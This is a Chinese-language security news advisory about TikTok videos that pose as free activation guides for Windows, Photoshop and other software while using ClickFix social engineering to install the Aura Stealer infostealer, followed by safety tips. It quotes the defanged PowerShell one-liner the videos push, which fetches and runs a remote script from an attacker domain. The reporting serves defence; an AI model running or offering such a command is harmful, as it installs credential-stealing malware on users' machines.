TikTok 视频仍在通过 ClickFix 攻击传播 Infostealer 恶意软件
网络犯罪分子利用 TikTok 视频来欺骗人们,这些视频看起来像是 Windows、Spotify 和 Netflix 等流行软件的免费激活指南,但实际上传播的是窃取您信息的恶意软件。
这些假视频声称展示了如何激活 Windows、Microsoft 365、Photoshop 和 Discord Nitro 等内容,但其真正目的是感染观众的设备。
怎么了?
这些视频使用 ClickFix 攻击,这是一种社会工程技巧,看起来像是一个有用的修复程序,但实际上诱使用户运行有害的 PowerShell 命令或脚本来安装恶意软件。
每个视频都会显示一个快速的单行命令,并指导观看者以管理员身份在 PowerShell 中输入该命令。
他们让它们运行如下所示的脚本命令。
iex (irm slmgr[.]win/photoshop)
这些假视频中显示的 URL 会根据被模拟的软件而变化,因此 Windows 激活诈骗将使用其中包含“windows”而不是“photoshop”的链接。当用户运行推荐的命令时,PowerShell 连接到远程站点 (slmgr[.]win) 以获取并执行更多恶意脚本。
该脚本从 Cloudflare 页面下载两个文件,第一个文件(“updater.exe”)是 Aura Stealer,它会获取浏览器密码、cookie、加密钱包和应用程序凭据,然后将它们上传给攻击者。
还下载了第二个文件(“source.exe”),该文件编译更多恶意代码并在内存中启动它。
如何保持安全?
-
除非您完全信任源,否则切勿将从网站复制的命令直接运行到 PowerShell、命令提示符、文件资源管理器地址栏、Mac 或 Linux 终端中。
-
请始终从软件的真实网站寻求官方支持或更新。
-
检查 HTTPS 和域拼写:在下载任何内容之前,查找“https://”并仔细检查网站地址的拼写。
-
开启双因素身份验证:为您的帐户添加额外的保护,因此即使您的密码被盗,攻击者也无法轻松登录。
-
备份重要数据:保留重要文件的副本,以防恶意软件导致数据丢失或锁定。
